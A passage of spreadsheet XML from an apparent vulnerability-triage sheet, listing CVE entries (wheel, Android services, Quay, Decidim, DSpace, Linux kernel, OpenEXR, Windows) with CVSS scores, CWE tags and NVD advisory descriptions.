      <c r="F1759" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1759" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1759" s="5" t="inlineStr">
        <is>
          <t>wheel_project:wheel</t>
        </is>
      </c>
      <c r="I1759" s="5" t="inlineStr">
        <is>
          <t>2026-01-22</t>
        </is>
      </c>
      <c r="J1759" s="5" t="inlineStr"/>
      <c r="K1759" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-732</t>
        </is>
      </c>
      <c r="L1759" s="5" t="inlineStr">
        <is>
          <t>wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2.</t>
        </is>
      </c>
      <c r="M1759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24049</t>
        </is>
      </c>
    </row>
    <row r="1760">
      <c r="A1760" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28584</t>
        </is>
      </c>
      <c r="C1760" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1760" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1760" s="5" t="inlineStr"/>
      <c r="F1760" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1760" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1760" s="5" t="inlineStr"/>
      <c r="I1760" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1760" s="5" t="inlineStr"/>
      <c r="K1760" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1760" s="5" t="inlineStr">
        <is>
          <t>In createSessionInternal of PackageInstallerService.java, there is a possible way to permanently DoS the device due to a logic error in the code. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28584</t>
        </is>
      </c>
    </row>
    <row r="1761">
      <c r="A1761" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28596</t>
        </is>
      </c>
      <c r="C1761" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1761" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1761" s="5" t="inlineStr"/>
      <c r="F1761" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1761" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1761" s="5" t="inlineStr"/>
      <c r="I1761" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1761" s="5" t="inlineStr"/>
      <c r="K1761" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1761" s="5" t="inlineStr">
        <is>
          <t>In parseInterventionFromXml of GameManagerService.java, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28596</t>
        </is>
      </c>
    </row>
    <row r="1762">
      <c r="A1762" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28617</t>
        </is>
      </c>
      <c r="C1762" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1762" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1762" s="5" t="inlineStr"/>
      <c r="F1762" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1762" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1762" s="5" t="inlineStr"/>
      <c r="I1762" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1762" s="5" t="inlineStr"/>
      <c r="K1762" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1762" s="5" t="inlineStr">
        <is>
          <t>In add of WifiNetworkSuggestionsManager.java, there is a possible persistent DOS due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28617</t>
        </is>
      </c>
    </row>
    <row r="1763">
      <c r="A1763" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28633</t>
        </is>
      </c>
      <c r="C1763" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1763" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1763" s="5" t="inlineStr"/>
      <c r="F1763" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1763" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1763" s="5" t="inlineStr"/>
      <c r="I1763" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1763" s="5" t="inlineStr"/>
      <c r="K1763" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1763" s="5" t="inlineStr">
        <is>
          <t>In initForUserNoTracing of VoiceInteractionManagerService.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M1763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28633</t>
        </is>
      </c>
    </row>
    <row r="1764">
      <c r="A1764" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32591</t>
        </is>
      </c>
      <c r="C1764" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1764" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1764" s="5" t="inlineStr"/>
      <c r="F1764" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1764" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H1764" s="5" t="inlineStr">
        <is>
          <t>redhat:mirror_registry_for_red_hat_openshift, redhat:quay</t>
        </is>
      </c>
      <c r="I1764" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J1764" s="5" t="inlineStr"/>
      <c r="K1764" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1764" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay's Proxy Cache configuration feature. When an organization administrator configures an upstream registry for proxy caching, Quay makes a network connection to the specified registry hostname without verifying that it points to a legitimate external service. An attacker with organization administrator privileges could supply a crafted hostname to force the Quay server to make requests to internal network services, cloud infrastructure endpoints, or other resources that should not be accessible from the Quay application.</t>
        </is>
      </c>
      <c r="M1764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32591</t>
        </is>
      </c>
    </row>
    <row r="1765">
      <c r="A1765" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45376</t>
        </is>
      </c>
      <c r="C1765" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1765" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1765" s="5" t="inlineStr"/>
      <c r="F1765" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1765" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H1765" s="5" t="inlineStr"/>
      <c r="I1765" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1765" s="5" t="inlineStr"/>
      <c r="K1765" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1765" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.30.9, from 0.31.0 before 0.31.5, and in 0.32.0.rc1 before 0.32.0.rc2, the GET /admin/organization/users search interpolates params[:term] into raw Arel.sql ORDER BY similarity expressions before sanitization, allowing an authenticated organization administrator to execute blind PostgreSQL expressions and infer data through timing differences. This issue is fixed in versions 0.30.9, 0.31.5, and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M1765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45376</t>
        </is>
      </c>
    </row>
    <row r="1766">
      <c r="A1766" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49831</t>
        </is>
      </c>
      <c r="C1766" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1766" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1766" s="5" t="inlineStr"/>
      <c r="F1766" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1766" s="5" t="inlineStr">
        <is>
          <t>tomcat</t>
        </is>
      </c>
      <c r="H1766" s="5" t="inlineStr"/>
      <c r="I1766" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1766" s="5" t="inlineStr"/>
      <c r="K1766" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1766" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. Prior to versions 7.6.7, 8.4, 9.3, and 10.0, the Curation Task feature allows an output path to be used by the reporter (-r parameter), typically used to stream results and status of curation task operations. It is not restricted to any particular base path, meaning that any path writable by the DSpace (often 'tomcat') user is allowed. This constitutes a Path Traversal Vulnerability in the curate script. This issue has been patched in versions 7.6.7, 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="M1766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49831</t>
        </is>
      </c>
    </row>
    <row r="1767">
      <c r="A1767" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49833</t>
        </is>
      </c>
      <c r="C1767" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1767" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1767" s="5" t="inlineStr"/>
      <c r="F1767" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1767" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1767" s="5" t="inlineStr"/>
      <c r="I1767" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1767" s="5" t="inlineStr"/>
      <c r="K1767" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1767" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. From versions 8.0-rc1 to before 8.4, 9.0-rc1 to before 9.3, and 10-rc1 to before 10.0, a path traversal vulnerability is possible via the COAR Notify / LDN service in DSpace. The attacker MUST already have DSpace administrator credentials in order to perform the attack. When reading a file input stream of an "inbound pattern" / "template", used to generate an LDN message, the LDN class does not check for path traversal or restrict the templates to a known base path. This could allow an untrusted file from elsewhere in the file system (e.g. an export log, a bitstream path, a temporary file) to be read and interpreted as an Apache Velocity template. This issue has been patched in versions 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="M1767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49833</t>
        </is>
      </c>
    </row>
    <row r="1768">
      <c r="A1768" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54422</t>
        </is>
      </c>
      <c r="C1768" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1768" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1768" s="5" t="inlineStr"/>
      <c r="F1768" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1768" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1768" s="5" t="inlineStr"/>
      <c r="I1768" s="5" t="inlineStr">
        <is>
          <t>2026-07-24</t>
        </is>
      </c>
      <c r="J1768" s="5" t="inlineStr"/>
      <c r="K1768" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L1768" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Ironic Python Agent through 11.5.0, a malicious bootc container, when deployed using ironic-python-agent, may be able to extract the credentials used to download it.</t>
        </is>
      </c>
      <c r="M1768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54422</t>
        </is>
      </c>
    </row>
    <row r="1769">
      <c r="A1769" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63004</t>
        </is>
      </c>
      <c r="C1769" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1769" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1769" s="5" t="inlineStr"/>
      <c r="F1769" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1769" s="5" t="inlineStr">
        <is>
          <t>microsoft, oracle</t>
        </is>
      </c>
      <c r="H1769" s="5" t="inlineStr"/>
      <c r="I1769" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1769" s="5" t="inlineStr"/>
      <c r="K1769" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1769" s="5" t="inlineStr">
        <is>
          <t>Unleash is an open-source feature management platform. Prior to 7.5.2, 7.6.5, and 8.0.2, the addon and integration subsystem passes the operator-controlled parameters.url value from src/lib/addons/webhook.ts and the Slack, Microsoft Teams, Datadog, and New Relic integrations to Addon.fetchRetry in src/lib/addons/addon.ts without restricting loopback, link-local, private, or cloud metadata addresses. An authenticated actor with the root CREATE_ADDON or UPDATE_ADDON permission can cause the server to send requests from inside its network boundary, use integration event status as a blind probing oracle, forward Authorization, customHeaders, or DD-API-KEY values to an attacker-observed host, and deliver the feature-event JSON body to internal services. This issue is fixed in versions 7.5.2, 7.6.5, and 8.0.2.</t>
        </is>
      </c>
      <c r="M1769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63004</t>
        </is>
      </c>
    </row>
    <row r="1770">
      <c r="A1770" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64369</t>
        </is>
      </c>
      <c r="C1770" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1770" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1770" s="5" t="inlineStr"/>
      <c r="F1770" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1770" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1770" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1770" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J1770" s="5" t="inlineStr"/>
      <c r="K1770" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L1770" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390: Revert support for DCACHE_WORD_ACCESS
load_unaligned_zeropad() reads eight bytes from unaligned addresses and may
cross page boundaries. It handles exceptions which may happen if reading
from the second page results in an exception.
For pages which are donated to the Ultravisor for secure execution purposes
the do_secure_storage_access() exception handler however does not handle
such exceptions correctly. Such an exception may result in an endless
exception loop which will never be resolved.
An attempt to fix this [1] turned out to be not sufficient. For now revert
load_unaligned_zeropad() until this problem has been resolved in a proper
way.
Note that the implementation of load_unaligned_zeropad() itself is
correct. The revert is just a temporary workaround until there is complete
fix for secure storage access exceptions.
[1] commit b00be77302d7 ("s390/mm: Add missing secure storage access fixups for donated memory")</t>
        </is>
      </c>
      <c r="M1770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64369</t>
        </is>
      </c>
    </row>
    <row r="1771">
      <c r="A1771" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64370</t>
        </is>
      </c>
      <c r="C1771" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1771" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1771" s="5" t="inlineStr"/>
      <c r="F1771" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1771" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1771" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1771" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J1771" s="5" t="inlineStr"/>
      <c r="K1771" s="5" t="inlineStr"/>
      <c r="L1771" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
posix-cpu-timers: Fix pid refcount leak in do_cpu_nanosleep() error path
In do_cpu_nanosleep(), posix_cpu_timer_create() takes a pid reference
via get_pid() and stores it in timer.it.cpu.pid. If the subsequent
posix_cpu_timer_set() call fails, the function returns immediately
without calling posix_cpu_timer_del() to release the pid reference,
causing a leak.
Fix it by calling posix_cpu_timer_del() before the unlock-and-return
on the error path, consistent with the other exit paths in the same
function.</t>
        </is>
      </c>
      <c r="M1771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64370</t>
        </is>
      </c>
    </row>
    <row r="1772">
      <c r="A1772" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64371</t>
        </is>
      </c>
      <c r="C1772" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1772" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1772" s="5" t="inlineStr"/>
      <c r="F1772" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1772" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1772" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1772" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J1772" s="5" t="inlineStr"/>
      <c r="K1772" s="5" t="inlineStr"/>
      <c r="L1772" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
proc: protect ptrace_may_access() with exec_update_lock (part 1)
Fix the easy cases where procfs currently calls ptrace_may_access() without
exec_update_lock protection, where the fix is to simply add the extra lock
or use mm_access():
 - do_task_stat(): grab exec_update_lock
 - proc_pid_wchan(): grab exec_update_lock
 - proc_map_files_lookup(): use mm_access() instead of get_task_mm()
 - proc_map_files_readdir(): use mm_access() instead of get_task_mm()
 - proc_ns_get_link(): grab exec_update_lock
 - proc_ns_readlink(): grab exec_update_lock</t>
        </is>
      </c>
      <c r="M1772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64371</t>
        </is>
      </c>
    </row>
    <row r="1773">
      <c r="A1773" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64376</t>
        </is>
      </c>
      <c r="C1773" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1773" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1773" s="5" t="inlineStr"/>
      <c r="F1773" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1773" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1773" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1773" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J1773" s="5" t="inlineStr"/>
      <c r="K1773" s="5" t="inlineStr"/>
      <c r="L1773" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware_loader: fix device reference leak in firmware_upload_register()
firmware_upload_register()
  -&gt; fw_create_instance()
     -&gt; device_initialize()
After fw_create_instance() succeeds, the lifetime of the embedded struct
device is expected to be managed through the device core reference
counting, since fw_create_instance() has already called
device_initialize().
In firmware_upload_register(), if alloc_lookup_fw_priv() fails after
fw_create_instance() succeeds, the code reaches free_fw_sysfs and frees
fw_sysfs directly instead of releasing the device reference with
put_device(). This may leave the reference count of the embedded struct
device unbalanced, resulting in a refcount leak.
The issue was identified by a static analysis tool I developed and
confirmed by manual review. Fix this by using put_device(fw_dev) in the
failure path and letting fw_dev_release() handle the final cleanup,
instead of freeing the instance directly from the error path.</t>
        </is>
      </c>
      <c r="M1773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64376</t>
        </is>
      </c>
    </row>
    <row r="1774">
      <c r="A1774" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68514</t>
        </is>
      </c>
      <c r="C1774" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1774" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1774" s="5" t="inlineStr"/>
      <c r="F1774" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1774" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1774" s="5" t="inlineStr"/>
      <c r="I1774" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1774" s="5" t="inlineStr"/>
      <c r="K1774" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L1774" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image file format, widely used in the motion picture industry. In versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13, the PyOpenEXR Python bindings contain a heap out-of-bounds write triggered when reading a crafted deep scanline EXR file. When a deep file declares a literal channel named left alongside layer-prefixed RGB channels left.R, left.G, and left.B, the wrapper processes the literal left channel first and allocates a scalar deep sample array for it, then reuses that same array as the coalesced destination for the prefixed RGB group. The deep reader registers sample slices with an RGB stride (three lanes) into storage that was allocated with scalar shape, so decoding the deep samples writes past the allocation. Opening such a file through the default public Python API, OpenEXR.File(path), causes a heap buffer overflow during normal deep sample decode, leading to memory corruption and a crash. This issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="M1774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68514</t>
        </is>
      </c>
    </row>
    <row r="1775">
      <c r="A1775" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68830</t>
        </is>
      </c>
      <c r="C1775" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1775" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1775" s="5" t="inlineStr"/>
      <c r="F1775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1775" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1775" s="5" t="inlineStr"/>
      <c r="I1775" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1775" s="5" t="inlineStr"/>
      <c r="K1775" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-59</t>
        </is>
      </c>
      <c r="L1775" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t>
        </is>
      </c>
    </row>
    <row r="1776">
      <c r="A1776" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68831</t>
        </is>
      </c>
      <c r="C1776" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1776" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1776" s="5" t="inlineStr"/>
      <c r="F1776" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1776" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1776" s="5" t="inlineStr"/>
      <c r="I1776" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1776" s="5" t="inlineStr"/>
      <c r="K1776" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L1776" s="5" t="inlineStr">
        <is>
          <t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t>
        </is>
      </c>
    </row>
    <row r="1777">
      <c r="A1777" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68842</t>
        </is>
      </c>
      <c r="C1777" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1777" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1777" s="5" t="inlineStr"/>
      <c r="F1777" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1777" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1777" s="5" t="inlineStr"/>
      <c r="I1777" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1777" s="5" t="inlineStr"/>
      <c r="K1777" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1777" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68842</t>
        </is>
      </c>
    </row>
    <row r="1778">
      <c r="A1778" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68843</t>
        </is>
      </c>
      <c r="C1778" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1778" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1778" s="5" t="inlineStr"/>
      <c r="F1778" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1778" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1778" s="5" t="inlineStr"/>
      <c r="I1778" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1778" s="5" t="inlineStr"/>
      <c r="K1778" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1778" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1778" s="6" t="inlineStr">
        <is>
